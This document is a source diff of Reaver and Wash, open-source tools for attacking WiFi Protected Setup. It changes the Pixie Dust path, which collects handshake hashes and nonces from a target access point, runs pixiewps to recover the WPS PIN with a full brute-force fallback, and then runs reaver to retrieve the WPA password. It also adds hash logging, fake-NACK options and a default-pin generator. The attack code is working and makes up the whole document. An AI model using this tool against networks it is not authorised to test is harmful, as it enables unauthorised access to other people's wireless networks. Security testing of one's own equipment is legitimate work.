	1891
	1892	if(globule->dh_small != 1){
	1893	strcat(cmd_pixie," -r ");
	1894	strcat(cmd_pixie,pixie_pkr);
	1895	}
	1896
	1897	strcat(cmd_pixie," -s ");
	1898	strcat(cmd_pixie,pixie_ehash1);
	1899	strcat(cmd_pixie," -z ");
	1900	strcat(cmd_pixie,pixie_ehash2);
	1901	strcat(cmd_pixie," -a ");
	1902	strcat(cmd_pixie,pixie_authkey);
	1903	strcat(cmd_pixie," -n ");
	1904	strcat(cmd_pixie,pixie_enonce);
	1905
	1906
	1907	if(globule->dh_small == 1){
	1908	strcat(cmd_pixie," -S ");
	1909	}
	1910
	1911	if (get_pixie_log()) {
	1912	char *p_essid = wps->essid;
	1913	char *p_model = wps->peer_dev.model_name;
	1914	char *p_number = wps->peer_dev.model_number;
	1915	char *p_manu = wps->peer_dev.manufacturer;
	1916
	1917	if(!p_essid \|\| strlen(p_essid) < 0)
	1918	{
	1919	p_essid = get_ssid();
	1920	}
	1921
	1922	char p_filename[13];
	1923	char p_bssid[18];
	1924	strncpy(p_bssid, mac2str(get_bssid(),':'), 17);
	1925	p_bssid[17] = 0;
	1926
	1927	unsigned int j = 0;
	1928	unsigned int i = 0;
	1929	for ( ; i < 17; i++) {
	1930	if (p_bssid[i] != ':') {
	1931	p_filename[j] = p_bssid[i];
	1932	j++;
	1933	}
	1934	}
	1935
	1936	p_filename[12] = 0;
	1937	char p_path[64]; // Bigger for future implementation
	1938
	1939	// strncpy(p_path, "/usr/local/etc/reaver/", 22);
	1940
	1941	strncpy(p_path, p_filename, 12);
	1942	strncpy(p_path + 12, ".pixie", 64 - 12);
	1943
	1944	printf("\n[*] Saving collected data in: %s\n\n", p_path);
	1945
	1946	FILE *fp;
	1947	if (!(fp = fopen(p_path, "a")))
	1948	fprintf(stderr, "[X] Could not open file!\n");
	1949
	1950	if (!ftell(fp)) {
	1951	fputs("# Generated by Reaver 1.5.2\n", fp);
	1952	fputs("\n#!/usr/bin/env bash", fp);
	1953	fputs("\n# Target BSSID: ", fp);
	1954	fputs(p_bssid, fp);
	1955	fputs("\n# Target ESSID: ", fp);
	1956	fputs(p_essid, fp);
	1957	fputs("\n# Target MANUFACTURER: ", fp);
	1958	fputs(p_manu, fp);
	1959	fputs("\n# Target MODEL: ", fp);
	1960	fputs(p_model, fp);
	1961	fputs("\n# Target MODEL NUMBER: ", fp);
	1962	fputs(p_number, fp);
	1963	//TODO: Needs implementation to save pin(s) if aquired through -K
	1964	}
	1965
	1966	fputs("\n\n# PKE : ", fp);
	1967	fputs(pixie_pke, fp);
	1968	fputs("\n# PKR : ", fp);
	1969	fputs(pixie_pkr, fp);
	1970	fputs("\n# E-Hash1: ", fp);
	1971	fputs(pixie_ehash1, fp);
	1972	fputs("\n# E-Hash2: ", fp);
	1973	fputs(pixie_ehash2, fp);
	1974	fputs("\n# AuthKey: ", fp);
	1975	fputs(pixie_authkey, fp);
	1976	fputs("\n# E-Nonce: ", fp);
	1977	fputs(pixie_enonce, fp);
	1978	fputs("\n\n#-----Full command-----#\n", fp); // This is here for raw execution of pixiewps if treated as a script
	1979	fputs(cmd_pixie, fp);
	1980	fputs("\n", fp);
	1981
	1982	fclose(fp);
	1983	}
	1984
1853	1985
1854	1986	if(globule->op_pixie==1 \|\| globule->op_pixie==2 \|\| globule->op_pixie==3)
1855	1987	{
1856	1988
1857	1989	FILE *fpixe;
1858
1859		//printf(" -- cmd pixie : %s",cmd_pixie);
1860
	1990
1861	1991	if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
1862		printf("Error opening pipe!\n");
	1992	if ( get_debug()>=1 )
	1993	{ //verbose (-vvv)
	1994	printf("Error opening pipe!\n");
	1995	}
1863	1996	//return -1;
1864	1997	}
1865	1998
1866	1999	int pixie_test=0;
1867	2000	char pixie_pin[16];
1868	2001	char *aux_pixie_pin;
	2002	int i=0;
1869	2003
1870	2004	memset(pixie_pin, 0, sizeof(pixie_pin));
	2005	if ( get_debug() >= 1 )
	2006	{ //verbose (-vvv)
	2007	printf("[+] Running pixiewps with the information, wait ...\n");
	2008	}
	2009	//printf("Cmd : %s\n",cmd_pixie);
1871	2010
1872	2011	while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
1873	2012	{
1874
1875		printf("[Pixie-Dust] %s", pixie_buf_aux);
	2013	if ( get_debug() >= 1 )
	2014	{ //verbose (-vvv)
	2015	printf("[Pixie-Dust] %s", pixie_buf_aux);
	2016	}
1876	2017
1877	2018	aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found");
1878	2019	if(aux_pixie_pin != NULL)
1879	2020	{
1880	2021	pixie_test = 0;
1881		//exit(0);
	2022	//break;
1882	2023	}
	2024
1883	2025
1884	2026	aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:");
1885	2027	if(aux_pixie_pin != NULL)
1886	2028	{
1887	2029	pixie_test = 1;
1888		//exit(0);
1889	2030	//here will get the pin
1890		strncpy(pixie_pin, aux_pixie_pin + 12, 8);
	2031
	2032	//a slightly better way to locate the pin
	2033	//thx offensive-security by attention
	2034
	2035	for(i=0;i<strlen(aux_pixie_pin);i++)
	2036	{
	2037	if(isdigit(aux_pixie_pin[i]))
	2038	{
	2039	strncpy(pixie_pin, aux_pixie_pin + i, 8);
	2040	break;
	2041	}
	2042	}
	2043
	2044	if ( get_debug()>=1 )
	2045	{ //verbose (-vvv)
	2046	printf("[Pixie-Dust]\n");
	2047	}
	2048	break;
1891	2049	}
1892	2050
1893	2051	}
	2052
1894	2053
1895	2054	if(pclose(fpixe)) {
1896	2055	//printf("Command not found or exited with error status\n");
1897	2056	//return -1;
1898	2057	}
	2058
	2059
	2060	if(pixie_test == 0)
	2061	{
	2062	//Pin not found, trying -f (full PRNG brute force)
	2063
	2064	strcat(cmd_pixie," -f ");
	2065
	2066	if ( get_debug()>=1 )
	2067	{ //verbose (-vvv)
	2068	printf("[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes\n");
	2069	}
	2070	//printf("Cmd : %s\n",cmd_pixie);
	2071
	2072	if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
	2073	if ( get_debug()>=1 )
	2074	{ //verbose (-vvv)
	2075	printf("Error opening pipe!\n");
	2076	}
	2077	//return -1;
	2078	}
	2079
	2080	while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
	2081	{
	2082	if ( get_debug()>=1 )
	2083	{ //verbose (-vvv)
	2084	printf("[Pixie-Dust] %s", pixie_buf_aux);
	2085	}
	2086
	2087	aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found");
	2088	if(aux_pixie_pin != NULL)
	2089	{
	2090	pixie_test = 0;
	2091	break;
	2092	}
	2093
	2094	aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:");
	2095	if(aux_pixie_pin != NULL)
	2096	{
	2097	pixie_test = 1;
	2098
	2099	//here will get the pin
	2100
	2101	//a slightly better way to locate the pin
	2102	//thx offensive-security by attention
	2103
	2104	for(i=0;i<strlen(aux_pixie_pin);i++)
	2105	{
	2106	if(isdigit(aux_pixie_pin[i]))
	2107	{
	2108	strncpy(pixie_pin, aux_pixie_pin + i, 8);
	2109	break;
	2110	}
	2111	}
	2112
	2113	break;
	2114	}
	2115
	2116	}
	2117	if ( get_debug()>=1 )
	2118	{ //verbose (-vvv)
	2119	printf("[Pixie-Dust]\n");
	2120	}
	2121
	2122	if(pclose(fpixe)) {
	2123	//printf("Command not found or exited with error status\n");
	2124	//return -1;
	2125	}
	2126
	2127
	2128
	2129	}
	2130
1899	2131
1900	2132	if((pixie_test == 1) && (globule->op_autopass==1))
1901	2133	{
1902	2134	//here will make the test to get pass
1903	2135
1904	2136	FILE *fpixe_test;
1905
1906		//strcat(globule->cmd_reaver_test," -p ");
1907		//strcat(globule->cmd_reaver_test,pixie_pin);
1908	2137
1909	2138	char cmd_reaver_test_aux[4000];
1910	2139	char cmd_buf_c[5];

1927	2156	//printf("-- %s\n",cmd_reaver_test_aux);
1928	2157
1929	2158	if ((fpixe_test = popen(cmd_reaver_test_aux, "r")) == NULL) {
1930		printf("Error opening pipe!\n");
	2159	if ( get_debug()==4 )
	2160	{ //verbose (-vvv)
	2161	printf("Error opening pipe!\n");
	2162	}
1931	2163	//return -1;
1932	2164	}
1933	2165
1934
1935		printf("Running reaver with the correct pin, wait ...\n");
1936		printf("Cmd : %s\n\n",cmd_reaver_test_aux);
1937		printf("[Reaver Test] BSSID: %s\n", mac2str(get_bssid(),':'));
1938		printf("[Reaver Test] Channel: %s\n", cmd_buf_c);
	2166	if ( get_debug()>=3 )
	2167	{ //verbose (-vvv)
	2168	printf("[+] Running reaver with the correct pin, wait ...\n");
	2169	printf("[+] Cmd : %s\n",cmd_reaver_test_aux);
	2170	}
	2171	printf("[Reaver Test] [+] BSSID: %s\n", mac2str(get_bssid(),':'));
	2172	printf("[Reaver Test] [+] Channel: %s\n", cmd_buf_c);
	2173
1939	2174	//printf("Command : \n", globule->cmd_reaver_test);
1940	2175	while (fgets(pixie_buf_aux2, 4000, fpixe_test) != NULL)
1941	2176	{

1968	2203	}
1969	2204
1970	2205	}
1971
1972		//printf(" %s ",cmd_pixie);
1973
1974
	2206
1975	2207	return 0;
1976	2208	}
1977	2209

2103	2335	wps->dh_pubkey_e = wpabuf_alloc_copy(pk, pk_len);
2104	2336	if (wps->dh_pubkey_e == NULL)
2105	2337	return -1;
	2338
	2339
2106	2340
2107	2341	/**** ADD THIS PART ****/
2108		// memset (cmd_pixie,0,sizeof(cmd_pixie));
2109		strcat(cmd_pixie," -e ");
2110		//sprintf( cmd_pixie, "", cmd_pixie, str2);
2111
2112		printf("[P] PKE: ");
	2342
	2343	memset(pixie_pke,0,sizeof(pixie_pke));
	2344	if ( get_debug()==4 )
	2345	{ //verbose (-vvv)
	2346	printf("[P] PKE: ");
	2347	}
2113	2348	int pixiecnt = 0;
2114	2349	for (; pixiecnt < 192; pixiecnt++) {
2115		printf("%02x", pk[pixiecnt]);
	2350	if ( get_debug()==4 )
	2351	{ //verbose (-vvv)
	2352	printf("%02x", pk[pixiecnt]);
	2353	}
2116	2354	sprintf(cmd_pixie_aux, "%02x", pk[pixiecnt]);
2117		strcat(cmd_pixie,cmd_pixie_aux);
	2355	strcat(pixie_pke, cmd_pixie_aux);
2118	2356	if (pixiecnt != 191) {
2119		printf(":");
2120		strcat(cmd_pixie,":");
2121		}
2122		}
2123		printf("\n");
	2357	if ( get_debug()==4 )
	2358	{ //verbose (-vvv)
	2359	printf(":");
	2360	}
	2361	strcat(pixie_pke,":");
	2362	}
	2363	}
	2364	if ( get_debug()==4 )
	2365	{ //verbose (-vvv)
	2366	printf("\n");
	2367	}
2124	2368	/******/
	2369
	2370
2125	2371
2126	2372	return 0;
2127	2373	}

+16

-13

src/wpscrack.c less more

0	0	/*
1	1	* Reaver - Main and usage functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

36	37
37	38	int main(int argc, char **argv)
38	39	{
39		int ret_val = EXIT_FAILURE, r = 0;
	40	int ret_val = EXIT_FAILURE;
40	41	time_t start_time = 0, end_time = 0;
41	42	struct wps_data *wps = NULL;
42	43
43	44
44	45	globule_init();
45		sql_init();
46	46	init_default_settings();
47	47
48	48	int cont_arg_rev;

55	55
56	56	printf("\nReaver v%s WiFi Protected Setup Attack Tool\n", PACKAGE_VERSION);
57	57	printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>\n");
58		printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212\n\n");
	58	printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft\n\n");
59	59
60	60	if(argc < 2)
61	61	{

87	87	}
88	88	}
89	89
90		/* Sanity checking on the message timeout value */
91		if(get_m57_timeout() > M57_MAX_TIMEOUT)
	90	/* Sanity checking on the message timeout value */
	91	if(get_m57_timeout() > M57_MAX_TIMEOUT)
92	92	{
93	93	set_m57_timeout(M57_MAX_TIMEOUT);
94	94	}

129	129	/* Run user-supplied command */
130	130	if(get_exec_string())
131	131	{
132		r = system(get_exec_string());
	132	system(get_exec_string());
133	133	}
134	134
135	135	ret_val = EXIT_SUCCESS;
136	136	}
137		else
	137	else
138	138	{
139	139	cprintf(CRITICAL, "[-] Failed to recover WPA key\n");
140	140	}

164	164	fprintf(stderr, "\t-s, --session=<file> Restore a previous session file\n");
165	165	fprintf(stderr, "\t-C, --exec=<command> Execute the supplied command upon successful pin recovery\n");
166	166	fprintf(stderr, "\t-D, --daemonize Daemonize reaver\n");
167		fprintf(stderr, "\t-a, --auto Auto detect the best advanced options for the target AP\n");
168	167	fprintf(stderr, "\t-f, --fixed Disable channel hopping\n");
169	168	fprintf(stderr, "\t-5, --5ghz Use 5GHz 802.11 channels\n");
170	169	fprintf(stderr, "\t-v, --verbose Display non-critical warnings (-vv for more)\n");
171	170	fprintf(stderr, "\t-q, --quiet Only display critical messages\n");
172	171	//fprintf(stderr, "\t-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR \n");
173		fprintf(stderr, "\t-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)\n");
	172	fprintf(stderr, "\t-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek)\n");
174	173	fprintf(stderr, "\t-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful\n");
175	174	fprintf(stderr, "\t-h, --help Show help\n");
176	175

178	177	fprintf(stderr, "\t-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin\n");
179	178	fprintf(stderr, "\t-d, --delay=<seconds> Set the delay between pin attempts [%d]\n", DEFAULT_DELAY);
180	179	fprintf(stderr, "\t-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [%d]\n", DEFAULT_LOCK_DELAY);
	180	fprintf(stderr, "\t-F, --fake-delay=<seconds> Set the time to sleep after received fake NACK [%d]\n",DEFAULT_FK_NACK_DELAY);
	181	fprintf(stderr, "\t-R, --fake-reason=<nack reason> Specifies the reason code for NACK used in the FAKE NACK\n");
	182	fprintf(stderr, "\t-I, --ignore-reason Ignore change of reason code for NACK\n");
181	183	fprintf(stderr, "\t-g, --max-attempts=<num> Quit after num pin attempts\n");
182	184	fprintf(stderr, "\t-x, --fail-wait=<seconds> Set the time to sleep after %d unexpected failures [0]\n", WARN_FAILURE_COUNT);
183	185	fprintf(stderr, "\t-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts\n");

194	196	fprintf(stderr, "\t-1, --p1-index Set initial array index for the first half of the pin [False]\n");
195	197	fprintf(stderr, "\t-2, --p2-index Set initial array index for the second half of the pin [False]\n");
196	198	fprintf(stderr, "\t-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]\n");
197		fprintf(stderr, "\t-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link\n");
198
199
200		fprintf(stderr, "\nExample:\n\t%s -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1\n\n", prog_name);
	199	fprintf(stderr, "\t-W, --generate-pin Default Pin Generator [1] Belkin [2] D-Link [3] Zyxel\n");
	200	fprintf(stderr, "\t-H, --pixiedust-log Enables logging of sequence completed PixieHashes\n");
	201
	202
	203	fprintf(stderr, "\nExample:\n\t%s -i wlan0mon -b 00:90:4C:C1:AC:21 -vvv -K 1\n\n", prog_name);
201	204
202	205	return EXIT_FAILURE;
203	206	}

+131

-80

src/wpsmon.c less more

35	35	int o_file_p = 0;
36	36	int get_chipset_output = 0;
37	37	int c_fix = 0;
	38	int show_all_aps = 0;
	39
	40	static struct mac {
	41	unsigned char mac[6];
	42	unsigned char probes;
	43	unsigned char flags;
	44	} seen_list[256];
	45	enum seen_flags {
	46	SEEN_FLAG_PRINTED = 1,
	47	SEEN_FLAG_COMPLETE = 2,
	48	};
	49	static unsigned seen_count;
	50	static int list_insert(char *bssid) {
	51	unsigned i;
	52	unsigned char mac[6];
	53	str2mac(bssid, mac);
	54	if(seen_count >= 256) return -1;
	55	for(i=0; i<seen_count; i++)
	56	if(!memcmp(seen_list[i].mac, mac, 6)) return i;
	57	memcpy(seen_list[seen_count].mac, mac, 6);
	58	return seen_count++;
	59	}
	60	static int was_printed(char* bssid) {
	61	int x = list_insert(bssid);
	62	if(x >= 0 && x < 256) {
	63	unsigned f = seen_list[x].flags;
	64	seen_list[x].flags \|= SEEN_FLAG_PRINTED;
	65	return f & SEEN_FLAG_PRINTED;
	66	}
	67	return 1;
	68	}
	69	static void mark_ap_complete(char *bssid) {
	70	int x = list_insert(bssid);
	71	if(x >= 0 && x < 256) seen_list[x].flags \|= SEEN_FLAG_COMPLETE;
	72	}
	73	static int is_done(char *bssid) {
	74	int x = list_insert(bssid);
	75	if(x >= 0 && x < 256) return seen_list[x].flags & SEEN_FLAG_COMPLETE;
	76	return 1;
	77	}
	78	static int should_probe(char *bssid) {
	79	int x = list_insert(bssid);
	80	if(x >= 0 && x < 256) return seen_list[x].probes < get_max_num_probes();
	81	return 0;
	82	}
	83	static void update_probe_count(char *bssid) {
	84	int x = list_insert(bssid);
	85	if(x >= 0 && x < 256) seen_list[x].probes++;
	86	}
38	87
39	88	int main(int argc, char *argv[])
40	89	{

44	93	int source = INTERFACE, ret_val = EXIT_FAILURE;
45	94	struct bpf_program bpf = { 0 };
46	95	char out_file = NULL, last_optarg = NULL, target = NULL, bssid = NULL;
47		char *short_options = "i:c:n:o:b:5sfuCDhPg";
	96	char *short_options = "i:c:n:o:b:5sfuDhPga";
48	97	struct option long_options[] = {
49	98	{ "get-chipset", no_argument, NULL, 'g' },
50	99	{ "output-piped", no_argument, NULL, 'P' },

55	104	{ "probes", required_argument, NULL, 'n' },
56	105	{ "daemonize", no_argument, NULL, 'D' },
57	106	{ "file", no_argument, NULL, 'f' },
58		{ "ignore-fcs", no_argument, NULL, 'C' },
59	107	{ "5ghz", no_argument, NULL, '5' },
60	108	{ "scan", no_argument, NULL, 's' },
61	109	{ "survey", no_argument, NULL, 'u' },
	110	{ "all", no_argument, NULL, 'a' },
62	111	{ "help", no_argument, NULL, 'h' },
63	112	{ 0, 0, 0, 0 }
64	113	};
65
	114
66	115
67	116	globule_init();
68		sql_init();
69		create_ap_table();
70	117	set_auto_channel_select(0);
71	118	set_wifi_band(BG_BAND);
72	119	set_debug(INFO);
73		set_validate_fcs(1);
	120	set_validate_fcs(0);
74	121	set_log_file(stdout);
75	122	set_max_num_probes(DEFAULT_MAX_NUM_PROBES);
76	123

114	161	case 'u':
115	162	mode = SURVEY;
116	163	break;
117		case 'C':
118		set_validate_fcs(0);
119		break;
120	164	case 'D':
121	165	daemonize();
	166	break;
	167	case 'a':
	168	show_all_aps = 1;
122	169	break;
123	170	default:
124	171	usage(argv[0]);

136	183	last_optarg = strdup(optarg);
137	184	}
138	185	}
139
	186
140	187	if (o_file_p == 0)
141	188	{
142	189	printf("\nWash v%s WiFi Protected Setup Scan Tool\n", PACKAGE_VERSION);
143		printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>\n");
144		printf("mod by t6_x <[email protected]> & DataHead & Soxrok2212\n\n");
145		}
	190	printf("Copyright (c) 2011, Tactical Network Solutions, Craig Heffner\n");
	191	printf("mod by t6_x<[email protected]>, DataHead, Soxrok2212, Wiire, AAnarchYY & rofl0r\n\n");
	192	}
146	193
147	194	/* The interface value won't be set if capture files were specified; else, there should have been an interface specified */
148	195	if(!get_iface() && source != PCAP_FILE)

172	219	/* Open the output file, if any. If none, write to stdout. */
173	220	if(out_file)
174	221	{
175
	222
176	223	fp = fopen(out_file, "wb");
177	224	if(!fp)
178	225	{
179	226	cprintf(CRITICAL, "[X] ERROR: Failed to open '%s' for writing\n", out_file);
180	227	goto end;
181	228	}
182
	229
183	230
184	231	set_log_file(fp);
185	232	}
186	233
187		/*
	234	/*
188	235	* Loop through all of the specified capture sources. If an interface was specified, this will only loop once and the
189	236	* call to monitor() will block indefinitely. If capture files were specified, this will loop through each file specified
190	237	* on the command line and monitor() will return after each file has been processed.

240	287
241	288	end:
242	289	globule_deinit();
243		sql_cleanup();
244	290	if(bssid) free(bssid);
245	291	if(out_file) free(out_file);
246	292	if(wpsmon.fp) fclose(wpsmon.fp);

262	308	/* If we aren't reading from a pcap file, set the interface channel */
263	309	if(source == INTERFACE)
264	310	{
265		/*
266		* If a channel has been specified, set the interface to that channel.
267		* Else, set a recurring 1 second timer that will call sigalrm() and switch to
	311	/*
	312	* If a channel has been specified, set the interface to that channel.
	313	* Else, set a recurring 1 second timer that will call sigalrm() and switch to
268	314	* a new channel.
269	315	*/
270	316	if(channel > 0)

284	330	{
285	331	if (o_file_p == 0)
286	332	{
287		cprintf(INFO, "BSSID Channel RSSI WPS Version WPS Locked ESSID\n");
288		cprintf(INFO, "---------------------------------------------------------------------------------------------------------------\n");
	333	cprintf (INFO, "BSSID Ch dBm WPS Lck ESSID\n");
	334	//cprintf(INFO, "00:11:22:33:44:55 12 -77 1.0 Yes 0123456789abcdef0123456789abcdef\n");
	335	cprintf (INFO, "--------------------------------------------------------------------------------\n");
289	336	header_printed = 1;
290	337	}
291
	338
292	339	}
293	340
294	341	while((packet = next_packet(&header)))
295	342	{
296	343	parse_wps_settings(packet, &header, bssid, passive, mode, source);
	344	#ifndef __APPLE__
297	345	memset((void *) packet, 0, header.len);
	346	#endif
298	347	}
299	348
300	349	return;

309	358	char bssid = NULL, ssid = NULL, *lock_display = NULL;
310	359	int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0;
311	360	static int channel_changed = 0;
312
	361
313	362	char info_manufac[500];
314	363	char info_modelnum[500];
315	364	char info_modelserial[500];

323	372	}
324	373
325	374	rt_header = (struct radio_tap_header *) radio_header(packet, header->len);
	375
326	376	frame_header = (struct dot11_frame_header *) (packet + rt_header->len);
327	377
328	378	/* If a specific BSSID was specified, only parse packets from that BSSID */

351	401	channel_changed = 1;
352	402	}
353	403
	404
	405
	406
	407
354	408	if(frame_header->fc.sub_type == PROBE_RESPONSE \|\|
355	409	frame_header->fc.sub_type == SUBTYPE_BEACON)
356	410	{

359	413
360	414	if(!is_done(bssid) && (get_channel() == channel \|\| source == PCAP_FILE))
361	415	{
362		if(frame_header->fc.sub_type == SUBTYPE_BEACON &&
363		mode == SCAN &&
364		!passive &&
365		should_probe(bssid))
	416	if(frame_header->fc.sub_type == SUBTYPE_BEACON &&
	417	mode == SCAN &&
	418	!passive &&
	419	// should_probe(bssid))
	420	should_probe(bssid)
	421	#ifdef __APPLE__
	422	&& 0
	423	#endif
	424	)
366	425	{
367	426	send_probe_request(get_bssid(), get_ssid());
368	427	probe_sent = 1;
369	428	}
370
371		if(!insert(bssid, ssid, wps, encryption, rssi))
	429	if(!was_printed(bssid) && (wps->version > 0 \|\| show_all_aps == 1))
372	430	{
373		update(bssid, ssid, wps, encryption);
374		}
375		else if(wps->version > 0)
376		{
377		switch(wps->locked)
	431	if(wps->version > 0) switch(wps->locked)
378	432	{
379	433	case WPSLOCKED:
380	434	lock_display = YES;

383	437	case UNSPECIFIED:
384	438	lock_display = NO;
385	439	break;
386		}
387
	440	} else lock_display = NO;
	441
388	442	//ideas made by kcdtv
389
	443
390	444	if(get_chipset_output == 1)
391	445	//if(1)
392	446	{

396	450	cprintf(INFO,"Option (-g) REQUIRES a channel to be set with (-c)\n");
397	451	exit(0);
398	452	}
399
	453
400	454	FILE *fgchipset=NULL;
401	455	char cmd_chipset[4000];
402	456	char cmd_chipset_buf[4000];
403	457	char buffint[5];
404
	458
405	459	char *aux_cmd_chipset=NULL;
406
407
408
	460
	461
	462
409	463	memset(cmd_chipset, 0, sizeof(cmd_chipset));
410	464	memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf));
411	465	memset(info_manufac, 0, sizeof(info_manufac));
412	466	memset(info_modelnum, 0, sizeof(info_modelnum));
413	467	memset(info_modelserial, 0, sizeof(info_modelserial));
414
415
416
	468
	469
	470
417	471	strcat(cmd_chipset,"reaver -0 -s y -vv -i "); //need option to stop reaver in m1 stage
418	472	strcat(cmd_chipset,get_iface());
419
	473
420	474	strcat(cmd_chipset, " -b ");
421	475	strcat(cmd_chipset, mac2str(get_bssid(),':'));
422
	476
423	477	strcat(cmd_chipset," -c ");
424	478	snprintf(buffint, sizeof(buffint), "%d",channel);
425	479	strcat(cmd_chipset, buffint);
426
	480
427	481	//cprintf(INFO,"\n%s\n",cmd_chipset);
428	482
429	483	if ((fgchipset = popen(cmd_chipset, "r")) == NULL) {
430	484	printf("Error opening pipe!\n");
431	485	//return -1;
432	486	}
433
434
435
436		while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL)
	487
	488
	489
	490	while (fgets(cmd_chipset_buf, 4000, fgchipset) != NULL)
437	491	{
438	492	//[P] WPS Manufacturer: xxx
439	493	//[P] WPS Model Number: yyy

443	497	aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:");
444	498	if(aux_cmd_chipset != NULL)
445	499	{
446		//md_chipset_buf
447		strncpy(info_manufac, aux_cmd_chipset+21, sizeof(cmd_chipset_buf));
448		//cprintf(INFO,"%s\n",info_manufac);
449
	500	//bug fix by alxchk
	501	strncpy(info_manufac, aux_cmd_chipset+21, sizeof(info_manufac));
450	502	}
451	503
452	504	aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:");
453	505	if(aux_cmd_chipset != NULL)
454	506	{
455		strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(cmd_chipset_buf));
456
	507	//bug fix by alxchk
	508	strncpy(info_modelnum, aux_cmd_chipset+21, sizeof(info_modelnum));
	509
457	510	}
458	511
459	512	aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:");
460	513	if(aux_cmd_chipset != NULL)
461	514	{
462		strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(cmd_chipset_buf));
463
	515	//bug fix by alxchk
	516	strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(info_modelserial));
	517
464	518	}
465	519
466	520	}
467
	521
468	522	//cprintf(INFO,"\n%s\n",info_manufac);
469	523	info_manufac[strcspn ( info_manufac, "\n" )] = '\0';
470	524	info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0';
471	525	info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0';
472
	526
473	527
474	528
475	529	if(pclose(fgchipset)) {

477	531	//return -1;
478	532	}
479	533
480
	534
481	535
482	536	}
483
484
	537
	538
485	539	if (o_file_p == 0)
486	540	{
487		cprintf(INFO, "%17s %2d %.2d %d.%d %s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
	541	if(wps->version > 0)
	542	cprintf(INFO, "%17s %2d %.2d %d.%d %3s %s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
	543	else
	544	cprintf(INFO, "%17s %2d %.2d %s\n", bssid, channel, rssi, ssid);
488	545	}
489	546	else
490	547	{
491	548	if(get_chipset_output == 1)
492	549	{
493	550	cprintf(INFO, "%17s\|%2d\|%.2d\|%d.%d\|%s\|%s\|%s\|%s\|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial);
494
	551
495	552	}else
496	553	{
497	554	cprintf(INFO, "%17s\|%2d\|%.2d\|%d.%d\|%s\|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid);
498
	555
499	556	}
500
	557
501	558	}
502	559	}
503	560

506	563	update_probe_count(bssid);
507	564	}
508	565
509		/*
	566	/*
510	567	* If there was no WPS information, then the AP does not support WPS and we should ignore it from here on.
511	568	* If this was a probe response, then we've gotten all WPS info we can get from this AP and should ignore it from here on.
512	569	*/

518	575	}
519	576	}
520	577
521		/* Only update received signal strength if we are on the same channel as the AP, otherwise power measurements are screwy */
522		if(channel == get_channel())
523		{
524		update_ap_power(bssid, rssi);
525		}
526
527	578	free(bssid);
528	579	bssid = NULL;
529	580	}

568	619	fprintf(stderr, "\t-o, --out-file=<file> Write data to file\n");
569	620	fprintf(stderr, "\t-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [%d]\n", DEFAULT_MAX_NUM_PROBES);
570	621	fprintf(stderr, "\t-D, --daemonize Daemonize wash\n");
571		fprintf(stderr, "\t-C, --ignore-fcs Ignore frame checksum errors\n");
572	622	fprintf(stderr, "\t-5, --5ghz Use 5GHz 802.11 channels\n");
573	623	fprintf(stderr, "\t-s, --scan Use scan mode\n");
574	624	fprintf(stderr, "\t-u, --survey Use survey mode [default]\n");
575		fprintf(stderr, "\t-P, --output-piped Allows Wash output to be piped. Example. wash x\|y\|z...\n");
	625	fprintf(stderr, "\t-P, --output-piped Allows Wash output to be piped. Example. wash x\|y\|z...\n");
576	626	fprintf(stderr, "\t-g, --get-chipset Pipes output and runs reaver alongside to get chipset\n");
	627	fprintf(stderr, "\t-a, --all Show all APs, even those without WPS\n");
577	628	fprintf(stderr, "\t-h, --help Show help\n");
578	629
579	630	fprintf(stderr, "\nExample:\n");
580		fprintf(stderr, "\t%s -i mon0\n\n", prog);
	631	fprintf(stderr, "\t%s -i wlan0mon\n\n", prog);
581	632
582	633	return;
583	634	}

+0

-1

src/wpsmon.h less more

42	42	#include "globule.h"
43	43	#include "misc.h"
44	44	#include "init.h"
